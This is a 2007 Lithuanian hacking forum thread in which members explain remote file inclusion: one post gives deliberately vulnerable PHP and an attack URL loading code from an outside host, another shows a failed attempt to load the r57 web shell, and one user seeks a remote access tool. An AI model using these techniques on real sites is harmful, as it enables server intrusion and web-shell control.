Bendras forumas

Hakeriai dalinkitės patirtimi
Skelbti atsakymą
Žinutė
Autorius
Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#391 Standartinė GODhack » 2007 04 14 14:10

Naujas įrankis, pernelyg pavojingas, kad būtų parodytas.... :lol:
O siandien ryte as su Perl parasiau virusa kuris uzkrecia zmones, bet suprantat jis per daug pavojingas kad butu parodytas. :lol:

Kokiu mulkiu reik but kad tuo patiket?
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

brain5ide
profesionalas
profesionalas
Pranešimai:2030
Užsiregistravo:2004 12 01 19:05

#392 Standartinė brain5ide » 2007 04 14 16:32

Turint omeny, kad kalbama apie Javascript'ą ir client side kodo vykdymą tai visiškai realu, tuo tarpu Perl ir DNR kodus susieti būtų sudėtinga :)
Never argue with an idiot. They bring you down to their level and beat you with experience.

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#393 Standartinė GODhack » 2007 04 14 17:53

Nea. Abiem atvejais tiek toje naujienoje tiem mano "isradime" tiek pat realu kaip nusiperdus nuskrist i menuli kaip raketai. ir gala man tu mulkiu kurie tuo tiki.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
^Paulius^
ultra dalyvis
ultra dalyvis
Pranešimai:718
Užsiregistravo:2006 10 02 13:52
Miestas:Kaunas
Susisiekti:

#394 Standartinė ^Paulius^ » 2007 04 19 21:05

Ar imanoma kaip nors per PHP injekcija upload'inti PHP skripta? Jeigu imanoma, tai kaip? :oops:

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#395 Standartinė GODhack » 2007 04 20 19:11

Tarkim turim saita lamynas.lt/lama.php:

blabla

Kodas: Pasirinkti visus

<?php
   $color = 'blue';
   if ( isset( $_GET['SPALVA'] ) )
      $color = $_GET['SPALVA'];
   require( $color . '.php' );
?>
<form>
   <select name="SPALVA">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>
ir t.t. ...

Tada rasom:

Kodas: Pasirinkti visus

/lama.php?SPALVA=http://mano.kieciausias.saitas/phpkodas
Viskas. Ivedei php koda panaudodamas tikriausiai pacia paraciausia failo ivedimo i php injekcija. Gali pazaisti-pameginti ar tai tikrai suveikia ir kaip tai suveikia.

Tik bebejo cia as dar pavargau kol sugalvojau toki superlengvai pazeidziama pacio saito php koda. realybej truputi sunkiau buna.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
^Paulius^
ultra dalyvis
ultra dalyvis
Pranešimai:718
Užsiregistravo:2006 10 02 13:52
Miestas:Kaunas
Susisiekti:

#396 Standartinė ^Paulius^ » 2007 04 20 21:10

As kazka panasaus zinojau is zurnalo HAKERIS. Su PHP injekcija imanoma paleisti shell'a? Itariu, kad ne, todel ir noriu suzinoti kaip per PHP injekcija irasyti faila. :?

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#397 Standartinė GODhack » 2007 04 20 21:15

Tai as tau tai ir parasiau. Pamegink kur nors.
Kurios vietos nesupratai? Ar gal nesigauna? Nes nebandziau pats sitos savo rasliavos neturiu http servo po ranka.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
E~XODU~S
senbuvis
senbuvis
Pranešimai:172
Užsiregistravo:2007 02 11 12:13
Miestas:kaunas
Susisiekti:

#398 Standartinė E~XODU~S » 2007 04 20 21:26

Gal kas žinote iš kur parsisiūsti CIA 1.3 versiją?Nes RAt[] neveikia :roll: Gal kas žinote?
Paveikslėlis

Vartotojo avataras
^Paulius^
ultra dalyvis
ultra dalyvis
Pranešimai:718
Užsiregistravo:2006 10 02 13:52
Miestas:Kaunas
Susisiekti:

#399 Standartinė ^Paulius^ » 2007 04 20 21:45

GODhack rašė:Tai as tau tai ir parasiau. Pamegink kur nors.
Kurios vietos nesupratai? Ar gal nesigauna? Nes nebandziau pats sitos savo rasliavos neturiu http servo po ranka.
Na as bandau paleisti r57 shell'a ir man meta tokias klaidas:

Kodas: Pasirinkti visus

Warning: require() [function.require]: URL file-access is disabled in the server configuration in C:\wamp\www\index.php on line 5

Warning: require(http://127.0.0.1/r57shell.php) [function.require]: failed to open stream: no suitable wrapper could be found in C:\wamp\www\index.php on line 5

Fatal error: require() [function.require]: Failed opening required 'http://127.0.0.1/r57shell.php' (include_path='.;C:\php5\pear') in C:\wamp\www\index.php on line 5
Buvo dar daugiau, bet kai kurias sugebejau susitvarkyt. Is viso imanoma taip paleist? :roll:

E~XODU~S, http://www.google.lt/search?hl=lt&q=CIA ... A1ka&meta=

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#400 Standartinė GODhack » 2007 04 20 23:58

Nors paprastai tai naudojama exploito ikelimui, bet teoriskai imanoma ir tai ka tu nori padaryt.

Netrodo labai jau ziaurus tie tavo erorai galima isnagrineti juos ir ju isvangti.
Bent jau zaidybineje situacijoje kai pats sau ir adminas esi. Kaip matau reikalaujama kitokios konfiguracijos.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
E~XODU~S
senbuvis
senbuvis
Pranešimai:172
Užsiregistravo:2007 02 11 12:13
Miestas:kaunas
Susisiekti:

#401 Standartinė E~XODU~S » 2007 04 21 11:56

Nu nerandu...Užmuškite...gal kas galite duoti tikslią veikinčią svetainę? :roll: :roll: :roll: (sorry už nemandagumą :) )
Paveikslėlis

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#402 Standartinė GODhack » 2007 04 21 13:43

Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

brain5ide
profesionalas
profesionalas
Pranešimai:2030
Užsiregistravo:2004 12 01 19:05

#403 Standartinė brain5ide » 2007 04 21 23:03

GODhack rašė:Nors paprastai tai naudojama exploito ikelimui, bet teoriskai imanoma ir tai ka tu nori padaryt.

Netrodo labai jau ziaurus tie tavo erorai galima isnagrineti juos ir ju isvangti.
Bent jau zaidybineje situacijoje kai pats sau ir adminas esi. Kaip matau reikalaujama kitokios konfiguracijos.
Tiesą sakant tie errorai labai žiaurūs. Greičiausiai įjungtas pačiam serveryje SAFE_MODE ir neleidžia includinti nuotoliniu failu. Jeigu ir leistu tuos failus includinti, tai si r57 shello(ar bet kokio kito PHP shello) nebūtų naudos, nes paprasčiausiai uždraustos visos sisteminės funkcijos, kaip exec, system ir pan.
Never argue with an idiot. They bring you down to their level and beat you with experience.

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#404 Standartinė GODhack » 2007 04 22 00:06

Bet zaidybineje situacijoje galima ju isvengti. Ne taip tiesiog supratai mano pasakyma "nelabai ziaurus". Kaip ir pats sakei si bei ta pakeitus is admino puses erroru nelieka. Taigi tai nera kritiniai, neisvengiami errorai zlugdantys bet kokias viltis.

Aiskiau isireiskiant turim labai realia ir gan paprasta teorine galimybe ir beveik neigivendinama praktine.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

brain5ide
profesionalas
profesionalas
Pranešimai:2030
Užsiregistravo:2004 12 01 19:05

#405 Standartinė brain5ide » 2007 04 22 00:17

GODhack, apsikeitėm vaidmenim? Aš anksčiau teorines galimybes gvildendavau, o tu praktines :D
Never argue with an idiot. They bring you down to their level and beat you with experience.

Skelbti atsakymą

Grįžti į

Dabar prisijungę

Vartotojai naršantys šį forumą: 0 ir 0 svečių